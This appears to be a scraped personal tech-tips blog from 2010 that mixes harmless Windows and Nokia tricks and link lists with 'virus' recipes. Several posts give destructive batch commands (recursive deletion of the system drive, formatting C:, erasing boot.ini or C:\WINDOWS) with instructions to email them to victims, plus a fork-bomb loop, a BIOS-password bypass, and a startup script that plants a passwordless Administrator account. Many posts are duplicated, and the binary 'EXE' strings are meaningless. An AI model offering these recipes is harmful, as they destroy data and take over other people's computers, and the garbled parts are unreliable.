here are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!
PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….
Friday, November 12, 2010
Batch&Binary programs for formatting
Do not try it on your PC. Don’t mess around this is for educational purpose only
1.
go to notepad and type the following:
@Echo off
2. Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
next,these are programs to cause system crash:
Step 1. Copy The Following In Notepad Exactly as it says[format HDD]
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
Step 3. Send the EXE to People And Infect
try these also
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Try to figure out yourself rest
can’t spoonfeed
Its working.
1.
go to notepad and type the following:
@Echo off
2. Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
next,these are programs to cause system crash:
Step 1. Copy The Following In Notepad Exactly as it says[format HDD]
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
Step 3. Send the EXE to People And Infect
try these also
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Try to figure out yourself rest
can’t spoonfeed
Its working.
This is a VB Script to eject CD tray periodically like a joking virus
Type this code in notepad and save as all-files as "anyname.vbs". ==CODE below==do
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop And then open the VBS file see what will happen to your CD Drive ?
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop And then open the VBS file see what will happen to your CD Drive ?
Host Redirection...
Now I'll add a little more...
This is called "Host Redirection"...
1. ping www.google.com...u will get the IP...
2. just add "" in the host file...
Ex: 10.20.3.133 www.yahoo.com
3. Now try to open yahoo...the google page will be displayed...
This method is use in PHARMING ATTACK...
This is called "Host Redirection"...
1. ping www.google.com...u will get the IP...
2. just add "" in the host file...
Ex: 10.20.3.133 www.yahoo.com
3. Now try to open yahoo...the google page will be displayed...
This method is use in PHARMING ATTACK...
Block Websties By a simple logic, Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.dbrothersatyam.blocspot.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.dbrothersatyam.blocspot.com
-->www.dbrothersatyam.blocspot.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE: 127.0.0.3 www.dbrothersatyam.blocspot.com
127.0.0.4 www.dbrothersatyam.blocspot.com
127.0.0.5 www.dbrothersatyam.blocspot.com
etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.dbrothersatyam.blocspot.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.dbrothersatyam.blocspot.com
-->www.dbrothersatyam.blocspot.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE: 127.0.0.3 www.dbrothersatyam.blocspot.com
127.0.0.4 www.dbrothersatyam.blocspot.com
127.0.0.5 www.dbrothersatyam.blocspot.com
etc
haw can creat A Batch Virus...
1. open a notepad.
2. write:
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
3. save as anyname.bat.
Run the Batch file...
N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.
how can i create virus
A computer virus is a computer program that can copy itself and infect a computer.
First u have to think how would u infect the victim...
Like crash the system or malfunction a program or create a back door or steal data...
Then u need to develop the algorithm...
Like the main logic development, registry patch, stealth mode etc...
Last the coding...
U can code in C, C++, Java Script, VB etc...
But the ultimate requirement is Social Engineering...
2. write:
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
3. save as anyname.bat.
Run the Batch file...
N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.
how can i create virus
A computer virus is a computer program that can copy itself and infect a computer.
First u have to think how would u infect the victim...
Like crash the system or malfunction a program or create a back door or steal data...
Then u need to develop the algorithm...
Like the main logic development, registry patch, stealth mode etc...
Last the coding...
U can code in C, C++, Java Script, VB etc...
But the ultimate requirement is Social Engineering...
Saturday, July 17, 2010
Chat With Command Prompt.
If you want personal chat with a friend
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!
Block Websites Without Software.
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessible.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now inaccessible<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE: 127.0.0.3 www.xyz.com
127.0.0.4 www.abc.com
127.0.0.5 www.def.com
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessible.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now inaccessible<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE: 127.0.0.3 www.xyz.com
127.0.0.4 www.abc.com
127.0.0.5 www.def.com
Check time on the internet.
Google search offer cool tool to find time of any place around the ground
Just go to google.com and type any of the following
time in new york
time in delhi
time in <<>
you will get the the time..
Its gud for people you need to adjust thier comp time after every reboot..
this trick will not work for all cities and towns .However the following website can get the most
www.worldtimezone.com
Just go to google.com and type any of the following
time in new york
time in delhi
time in <<
you will get the the time..
Its gud for people you need to adjust thier comp time after every reboot..
this trick will not work for all cities and towns .However the following website can get the most
www.worldtimezone.com
Access restricted/blocked sites.
you are in office or school or university campus where Certain website is blocked, either by the office administrator or by your organization then you can access it easily without any hassles. This can also be tried by users living in countries where a particular website is blocked by their ISP. There are 2 sites that can help:
1.Just go to www.cooltunnel.com and type in the name of any site you want to access. This works for Orkut and other blocked sites too.
2.There is one more site www.gravitywars.com .This is updated regularly
you can also -- run àcmdàwrite à ping www.anything.com
u'll gt th ip address. then jst copy nd paste it in the url box to open it.
1.Just go to www.cooltunnel.com and type in the name of any site you want to access. This works for Orkut and other blocked sites too.
2.There is one more site www.gravitywars.com .This is updated regularly
you can also -- run àcmdàwrite à ping www.anything.com
u'll gt th ip address. then jst copy nd paste it in the url box to open it.
Use the Notepad as your personal diary.
There is a simple feature in Notepad that can make it work like a personal diary for you.
Here is how to go about it:
1.Firstly open a blank Notepad file.
2. Now write .LOG as the first line in the file, then press enter. Now save the file and close it.
3.Open the notepad file now and you will find that the current date and time has beenappended (put) at the end and the cursor is in the next line.
4. Type your notes and then save and close the file.
5. Each time you open the file, Notepad repeats the process,that is it appends the date and timeto the end of the file and places the cursor below it
Here is how to go about it:
1.Firstly open a blank Notepad file.
2. Now write .LOG as the first line in the file, then press enter. Now save the file and close it.
3.Open the notepad file now and you will find that the current date and time has beenappended (put) at the end and the cursor is in the next line.
4. Type your notes and then save and close the file.
5. Each time you open the file, Notepad repeats the process,that is it appends the date and timeto the end of the file and places the cursor below it
Tuesday, July 6, 2010
About Lavani
Lwani very small village which is near Fatehpur 84. Lwani village was a family in this time Bangarmau recipes are a big business. GAYA PRSHAD BARTAN BHANDAR which is called.
Saturday, June 12, 2010
Check pc configration & all infomation
Start->Help and support->support->advance system information
OR
open cmd prompt type systeminfo and hit enter
OR
right click on my computer and click on properties.
OR
open cmd prompt type systeminfo and hit enter
OR
right click on my computer and click on properties.
Creat an Admin Account in xp if you are as guest.C
Code:
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
now copy this to notepad and save as admin.bat
copy the file to the statup folder.
here is the path of startup folder.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
when the admin logs on the batch file runs and the admin acc is created...
so nxt time u log on u can use the username:admin
password:no
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
now copy this to notepad and save as admin.bat
copy the file to the statup folder.
here is the path of startup folder.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
when the admin logs on the batch file runs and the admin acc is created...
so nxt time u log on u can use the username:admin
password:no
HOW 2 remove password 4m administrator if ur cpu i
1): restart ur cpu
2): start pressing F8
3): then a screen will apear with options like "safe mode" etc.
4): choose "safe mode" option then it will load files
5): you will see windows is startin up
6): you will have 2 users to choose u will choose guest
7): when guest will be ready 2 use click "start menu"
8): then at da top guest will be writen click on guest
9): then there will be option in user accounts home
10): choose home administartor will be shown click on it
11): there will be writen remove password click on it and remove it
12): then restart ur cpu & enjoy
13): dnt frget 2 say thnks
2): start pressing F8
3): then a screen will apear with options like "safe mode" etc.
4): choose "safe mode" option then it will load files
5): you will see windows is startin up
6): you will have 2 users to choose u will choose guest
7): when guest will be ready 2 use click "start menu"
8): then at da top guest will be writen click on guest
9): then there will be option in user accounts home
10): choose home administartor will be shown click on it
11): there will be writen remove password click on it and remove it
12): then restart ur cpu & enjoy
13): dnt frget 2 say thnks
NOKIA MOBILE SECRET CODES
Nokia 1610/1630
*#170602112302# (software version)
Nokia 1610/1611
IMEI number: -*# 0 6 #
Software version: -* # 1 7 0 6 0 2 1 1 2 3 9 2 #
Simlock status: - # 9 2 7 0 2 6 8 9 #
Nokia 2110
*#9999# (software version)
2110i/2110e
*#170602112302# or (depends on model)*#682371158412125# (software version)
Nokia 3110
*#06# -IMEI
*#3110# -Software version
##002# - allows to turn off voice mail.
*#7780# - restore factory settings
*#746025625#(or *#sim0clock#) - to check if clock of sim (SIM-Clock) can be stopped (SIM-Clock-stop is akind of standby mode which saces battery)
*#92702689# (or *#war0anty#) -"warranty code:"- you have to enter one of the following codes:
6232 (OK)displays month and year of production date (ie "0198")
7332 (OK) - displays date of last repair - if there is (ie. "DATE NOT SAVED")
7832 (OK) - displays date of purchase - if there is (ie. "DATE NOT SAVED")
9268 (OK) -displays serial number
37832 (OK) -sets purchase date in format MMYY (MM - month, YY - year)- attention: you can set it only once, so beware !
87267 (OK)-displays message "Confirm Transfer?" - meaning is unknown (?)
* # 9 2 7 0 2 6 8 9 # -Simlock info
*#31# (call) -sets if your phone no. will be hidden or not (works only in some networks)
*#76# (call) -sets if target phone number when you call should be displayed (works only in some networks)
*#77# (call) -(work s only in some networks)
*#33/35# (call -displays message "Service not active".
**31# (call) -your no. will not be showed to others when you make a call
Nokia 3210
*#06# -IMEI
*#0000# -software version
*#92702689# (or *#war0anty#)- enters service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system Enhanced Full Rate .
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
xx# -Replace xx with desired phonebook entry - press # and you will see it on display.
Nokia 51XX
*#06# -IMEI
*#0000# - Software version
*#92702689#( or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
#pw+1234567890+1 -provider lock status
#pw+1234567890+2 -Network lock status
#pw+1234567890+3 -Provider lock status
#pw+1234567890+4 - SimCard lock status
NOKIA 61XX
*#06# -IMEI
*#0000# ;-*#99 99# (Nokia 6130)
*#92702689# (or *#war0anty#) Software versionEnter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
NOKIA8810
*#06# - IMEI
*#0000# -Software version
*#92702689# (or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy
#4720# -Turns off battery save mode - saves about 30 % of energy
NOKIA99OO
*#06# -IMEI
*#682371158412125# -Software version
*#3283# -Displays week and year of manufacture, ie. 1497 means 14th week of 1997
NOKIA 911O
*#06# IMEI
*#0000# SOFTWARE VERSION
*3370# Turns on sound encoding system - Enhanced Full Rate.
#3370# Turns off sound encoding system - Enhanced Full Rate.
*4720# Turns on battery save mode - saves about 30 % of energy.
#4720# Turns off battery save mode.
NOKIA 81XX
*#06# IMEI
*#8110# Software version
xx# Replace xx with desired phonebook entry - press # and you will see it on display
*#92702689# (or *#warOanty#)
"Warranty code:" - you have to enter one of the following codes:
9268 (OK) displays IMEI (International Mobile Equipment Identification)
6232 (OK) displays date of manufacture in format MMYY (MM - month, RR - year)
7832 (OK) displays date of purchase
7332 (OK) displays date of repair or upgrade
37832 (OK) sets date of purchase in format MMYY (MM - month, RR - year) - attention: you can set it only once, so beware !!!
87267 (OK) transmits user data/move data do service PC
*#170602112302# (software version)
Nokia 1610/1611
IMEI number: -*# 0 6 #
Software version: -* # 1 7 0 6 0 2 1 1 2 3 9 2 #
Simlock status: - # 9 2 7 0 2 6 8 9 #
Nokia 2110
*#9999# (software version)
2110i/2110e
*#170602112302# or (depends on model)*#682371158412125# (software version)
Nokia 3110
*#06# -IMEI
*#3110# -Software version
##002# - allows to turn off voice mail.
*#7780# - restore factory settings
*#746025625#(or *#sim0clock#) - to check if clock of sim (SIM-Clock) can be stopped (SIM-Clock-stop is akind of standby mode which saces battery)
*#92702689# (or *#war0anty#) -"warranty code:"- you have to enter one of the following codes:
6232 (OK)displays month and year of production date (ie "0198")
7332 (OK) - displays date of last repair - if there is (ie. "DATE NOT SAVED")
7832 (OK) - displays date of purchase - if there is (ie. "DATE NOT SAVED")
9268 (OK) -displays serial number
37832 (OK) -sets purchase date in format MMYY (MM - month, YY - year)- attention: you can set it only once, so beware !
87267 (OK)-displays message "Confirm Transfer?" - meaning is unknown (?)
* # 9 2 7 0 2 6 8 9 # -Simlock info
*#31# (call) -sets if your phone no. will be hidden or not (works only in some networks)
*#76# (call) -sets if target phone number when you call should be displayed (works only in some networks)
*#77# (call) -(work s only in some networks)
*#33/35# (call -displays message "Service not active".
**31# (call) -your no. will not be showed to others when you make a call
Nokia 3210
*#06# -IMEI
*#0000# -software version
*#92702689# (or *#war0anty#)- enters service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system Enhanced Full Rate .
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
xx# -Replace xx with desired phonebook entry - press # and you will see it on display.
Nokia 51XX
*#06# -IMEI
*#0000# - Software version
*#92702689#( or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
#pw+1234567890+1 -provider lock status
#pw+1234567890+2 -Network lock status
#pw+1234567890+3 -Provider lock status
#pw+1234567890+4 - SimCard lock status
NOKIA 61XX
*#06# -IMEI
*#0000# ;-*#99 99# (Nokia 6130)
*#92702689# (or *#war0anty#) Software versionEnter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
NOKIA8810
*#06# - IMEI
*#0000# -Software version
*#92702689# (or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy
#4720# -Turns off battery save mode - saves about 30 % of energy
NOKIA99OO
*#06# -IMEI
*#682371158412125# -Software version
*#3283# -Displays week and year of manufacture, ie. 1497 means 14th week of 1997
NOKIA 911O
*#06# IMEI
*#0000# SOFTWARE VERSION
*3370# Turns on sound encoding system - Enhanced Full Rate.
#3370# Turns off sound encoding system - Enhanced Full Rate.
*4720# Turns on battery save mode - saves about 30 % of energy.
#4720# Turns off battery save mode.
NOKIA 81XX
*#06# IMEI
*#8110# Software version
xx# Replace xx with desired phonebook entry - press # and you will see it on display
*#92702689# (or *#warOanty#)
"Warranty code:" - you have to enter one of the following codes:
9268 (OK) displays IMEI (International Mobile Equipment Identification)
6232 (OK) displays date of manufacture in format MMYY (MM - month, RR - year)
7832 (OK) displays date of purchase
7332 (OK) displays date of repair or upgrade
37832 (OK) sets date of purchase in format MMYY (MM - month, RR - year) - attention: you can set it only once, so beware !!!
87267 (OK) transmits user data/move data do service PC
Monday, May 10, 2010
Locking the desktop
If you are leaving your computer for a while and do not wish to turn it off, but want to assure that no-one else can use the computer while you are away, locking the desktop is the best option.
By pressing WINDOWSKEY+L, you password protect your system just as if you had logged out or restarted the computer. The advantage is that any programs or processes that were running when you locked the desktop will stay open and running in the background, ready for you to resume work or play.
By pressing WINDOWSKEY+L, you password protect your system just as if you had logged out or restarted the computer. The advantage is that any programs or processes that were running when you locked the desktop will stay open and running in the background, ready for you to resume work or play.
Removing Shared Documents folder From My Computer
Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My Computer NameSpace DelegateFolders
You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My Computer NameSpace DelegateFolders
You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.
Remove Stored username and Passwords !
To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords
It Works
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords
It Works
Add your name to display clock!
go to control panel----->regional & language settings----->click on "customize" button---->click on "time" button-----> in AM symbol type your desired name---->in PM symbol type your desired name---> press ok twice-->
Sunday, May 2, 2010
A virus which opens and closes CD rom
Copy the follwing code in note pad and save it with extension .vbs
'code start from here:-
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
'code end from here
to end it go to taskmanager then
processes tab then end the wscript
'code start from here:-
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
'code end from here
to end it go to taskmanager then
processes tab then end the wscript
create virus in 2 min
heya guys dis is d procedure if u want to erase ur enemy's windows.by sending a so called virus(actuallly a cmd)
1.go to notepad type "erase C:\WINDOWS" without qoutes and save d file as
findoutaname.cmd
2. send dis thru email to any body and wen d person opens dis file .
his windows map will be lost
warning: dont run dis file on ur system
Comments Plz
1.go to notepad type "erase C:\WINDOWS" without qoutes and save d file as
findoutaname.cmd
2. send dis thru email to any body and wen d person opens dis file .
his windows map will be lost
warning: dont run dis file on ur system
Comments Plz
Speed Up Net Browsing!
Speed Up Your Net Browsing using the following steps--
* Open "Start"--> "Run"--> type "gpedit.msc".
* You will see "Local Computer Policy".
* Expand the "Administrative Templates" Branch.
* Expand the "Network" Branch.
* Highlight "QoS Packet Scheduler".
* Double-click "Limit Reservable Bandwidth".
* Check "Enabled".
* Change "Bandwidth limit [%]" to "0%".
* Click "Apply" and then "OK" and then "Restart".
* Open "Start"--> "Run"--> type "gpedit.msc".
* You will see "Local Computer Policy".
* Expand the "Administrative Templates" Branch.
* Expand the "Network" Branch.
* Highlight "QoS Packet Scheduler".
* Double-click "Limit Reservable Bandwidth".
* Check "Enabled".
* Change "Bandwidth limit [%]" to "0%".
* Click "Apply" and then "OK" and then "Restart".
Sunday, April 25, 2010
How to write the name in Japanies languege
A- ka * B- tu * C- mi * D- te * E- ku * F- lu * G- ji
H- ri * I- ki * J- zu * K- me * L- ta * M- rin *
N- to O-mo * P- no * Q- ke * R- shi * S- ari * T-chi U- do *
V- ru * W-mei * X- na * Y- fu * Z- zi
H- ri * I- ki * J- zu * K- me * L- ta * M- rin *
N- to O-mo * P- no * Q- ke * R- shi * S- ari * T-chi U- do *
V- ru * W-mei * X- na * Y- fu * Z- zi
Web sites.
101 Cookbooks - http://www.101cookbooks.com/index.rdf
About Today - http://z.about.com/6/nl/rss/todaysl.xml
BusinessWeek.com -- - http://www.businessweek.com/rss/bwdaily.rss
CNN.com Recently Published/Updated - http://rss.cnn.com/rss/cnn_latest.rss
Cricinfo news from Cricinfo - http://www.cricinfo.com/rss/index.rdf
CyberMedia India Online Limited - IT News - http://www.ciol.com/RSS/CIOL-ITNews.xml
Dictionary.com Word of the Day - http://dictionary.reference.com/wordoftheday/wotd.rss
Discovery News - Top Stories - http://dsc.discovery.com/news/topstories.xml
Engadget - http://www.engadget.com/rss.xml
ESPN.com - http://sports.espn.go.com/espn/rss/news
Finance-Economy-News-The Economic Times - http://economictimes.indiatimes.com/rssfeeds/1286551815.cms
Fodor's Travel Wire - http://www.fodors.com/blog/index.rdf
Fool.com: The Motley Fool - http://www.fool.com/About/headlines/rss_headlines.asp
Forbes.com: Most popular stories - http://www.forbes.com/feeds/popstories.xml
Funny Quote of the Day - http://www.brainyquote.com/link/quotefu.rss
glamsham.com - bollywood updates - http://www.glamsham.com/rss/glamRss.xml
Gmail Blog - http://gmailblog.blogspot.com/atom.xml
Hilarious Jokes on Funtoosh.com - http://www.funtoosh.com/rss/latest_jokes.php
Latest News Online - Express Indian - http://www.expressindia.com/syndications/ei.xml
Medindia Health News - http://www.medindia.net/rss2.0/rss.xml
News items | ZDNet - http://news.zdnet.com/2509-1_22-0-5.xml
News-The Times of India Cricket - http://cricket.indiatimes.com/rssfeeds/864838.cms
NYT Global Home - http://www.iht.com/rss/frontpage.xml
NYT Travel - http://www.nytimes.com/services/xml/rss/nyt/Travel.xml
Orkut Blog - http://en.blog.orkut.com/atom.xml
Quote of the Day - http://www.brainyquote.com/link/quotebr.rss
Reuters: Oddly Enough - http://www.reuters.com/rssFeed/oddlyEnoughNews?irpc=69
Rotten Tomatoes: Movies - http://i.rottentomatoes.com/syndication/rss/complete_movies.xml
TechTree.com - Recent Stuff - http://rss.techtree.com/cgi-bin/itn/rss/index.cgi?ws=tt&feed=recentstuff
The Financial Express - http://www.expressindia.com/syndications/fe.xml
The Official Google Blog - http://googleblog.blogspot.com/atom.xml
Wired Top Stories - http://www.wired.com/news/feeds/rss2/0,2610,,00.xml
Yahoo! News: Entertainment News - http://rss.news.yahoo.com/rss/entertainment
Vedio song & many vedio downlode- www.youtube.com
avi farmete movie downlode- www.moviesmobile.net
movie search engine- www.isohunt.com, www.seedpeer.com
movie,software, vedio & many more search engine - www.torrentz.com
change photo & set won pick - www.photofunia.com, photofun.com
Infarmaton of india - www.iloveindia.com
downlode ebook - www.ebookpdf.net, pdfebook.in
Many notes in search - www.docstoc.com
know any IP address of sites - wwwhcidata.info
mobile ring,wall,tones,software - www.cell11.com
downlode softwaer - www.doeload.cnet.com, user.software.informer.com
all computer language tutorial- www.w3schools.com
ASP.Net - quickstarts.asp.net
Animated 3d wallapaper - http://www.animewallpapers.com
Hindi & English song MP3 - www.funmuzik.com
http://is.gd/6YM56 --->durdarsen chaner & any moor chanel
http://is.gd/6Y9Ty --->hot spot chanel
http://is.gd/6YwdT --->nd tv
www.reuters.com/news/video)---> world's big news chanels comply
www.action8cricket.com, www.cricketlivestreaming.com --> sports
www.tvchannelsfree.com -- entertenment
www.pogo.com ---Game, online
About Today - http://z.about.com/6/nl/rss/todaysl.xml
BusinessWeek.com -- - http://www.businessweek.com/rss/bwdaily.rss
CNN.com Recently Published/Updated - http://rss.cnn.com/rss/cnn_latest.rss
Cricinfo news from Cricinfo - http://www.cricinfo.com/rss/index.rdf
CyberMedia India Online Limited - IT News - http://www.ciol.com/RSS/CIOL-ITNews.xml
Dictionary.com Word of the Day - http://dictionary.reference.com/wordoftheday/wotd.rss
Discovery News - Top Stories - http://dsc.discovery.com/news/topstories.xml
Engadget - http://www.engadget.com/rss.xml
ESPN.com - http://sports.espn.go.com/espn/rss/news
Finance-Economy-News-The Economic Times - http://economictimes.indiatimes.com/rssfeeds/1286551815.cms
Fodor's Travel Wire - http://www.fodors.com/blog/index.rdf
Fool.com: The Motley Fool - http://www.fool.com/About/headlines/rss_headlines.asp
Forbes.com: Most popular stories - http://www.forbes.com/feeds/popstories.xml
Funny Quote of the Day - http://www.brainyquote.com/link/quotefu.rss
glamsham.com - bollywood updates - http://www.glamsham.com/rss/glamRss.xml
Gmail Blog - http://gmailblog.blogspot.com/atom.xml
Hilarious Jokes on Funtoosh.com - http://www.funtoosh.com/rss/latest_jokes.php
Latest News Online - Express Indian - http://www.expressindia.com/syndications/ei.xml
Medindia Health News - http://www.medindia.net/rss2.0/rss.xml
News items | ZDNet - http://news.zdnet.com/2509-1_22-0-5.xml
News-The Times of India Cricket - http://cricket.indiatimes.com/rssfeeds/864838.cms
NYT Global Home - http://www.iht.com/rss/frontpage.xml
NYT Travel - http://www.nytimes.com/services/xml/rss/nyt/Travel.xml
Orkut Blog - http://en.blog.orkut.com/atom.xml
Quote of the Day - http://www.brainyquote.com/link/quotebr.rss
Reuters: Oddly Enough - http://www.reuters.com/rssFeed/oddlyEnoughNews?irpc=69
Rotten Tomatoes: Movies - http://i.rottentomatoes.com/syndication/rss/complete_movies.xml
TechTree.com - Recent Stuff - http://rss.techtree.com/cgi-bin/itn/rss/index.cgi?ws=tt&feed=recentstuff
The Financial Express - http://www.expressindia.com/syndications/fe.xml
The Official Google Blog - http://googleblog.blogspot.com/atom.xml
Wired Top Stories - http://www.wired.com/news/feeds/rss2/0,2610,,00.xml
Yahoo! News: Entertainment News - http://rss.news.yahoo.com/rss/entertainment
Vedio song & many vedio downlode- www.youtube.com
avi farmete movie downlode- www.moviesmobile.net
movie search engine- www.isohunt.com, www.seedpeer.com
movie,software, vedio & many more search engine - www.torrentz.com
change photo & set won pick - www.photofunia.com, photofun.com
Infarmaton of india - www.iloveindia.com
downlode ebook - www.ebookpdf.net, pdfebook.in
Many notes in search - www.docstoc.com
know any IP address of sites - wwwhcidata.info
mobile ring,wall,tones,software - www.cell11.com
downlode softwaer - www.doeload.cnet.com, user.software.informer.com
all computer language tutorial- www.w3schools.com
ASP.Net - quickstarts.asp.net
Animated 3d wallapaper - http://www.animewallpapers.com
Hindi & English song MP3 - www.funmuzik.com
http://is.gd/6YM56 --->durdarsen chaner & any moor chanel
http://is.gd/6Y9Ty --->hot spot chanel
http://is.gd/6YwdT --->nd tv
www.reuters.com/news/video)---> world's big news chanels comply
